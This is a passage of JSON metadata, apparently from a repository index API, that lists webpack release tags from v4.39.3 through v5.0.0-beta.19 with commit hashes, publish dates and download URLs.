dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,